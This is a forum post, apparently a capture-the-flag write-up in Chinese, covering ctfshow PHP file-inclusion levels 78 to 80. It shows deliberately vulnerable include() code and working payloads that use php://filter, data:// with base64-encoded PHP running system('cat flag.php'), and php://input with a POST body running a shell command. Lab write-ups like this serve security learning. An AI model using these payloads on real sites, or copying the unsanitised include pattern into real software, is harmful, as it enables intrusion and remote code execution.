Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

ctfshow—文件包含

 Share


KaiWn

Recommended Posts

PHP伪协议总结 - SegmentFault 思否

2621111-20220731014724756-69244247.png

WEB78 无防护读取源码

<?php
 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

伪协议读取后base64解密

payload:?file=php://filter/convert.base64-encode/resource=flag.php

web79 data协议

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了php,php到是可以用大写绕过,但是文件名flag.php中的php不能大小写,所以用cat这一类的函数,也可以直接base64绕过php

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');
ils/120361970

查看源代码

web80 input协议

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

php data被过滤

用input协议

继续使用php大小写绕过

2621111-20220731021218544-1523132314.png

GET:
 ?file=phP://input
POST:
<?PHP system('tac fl*');?>
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...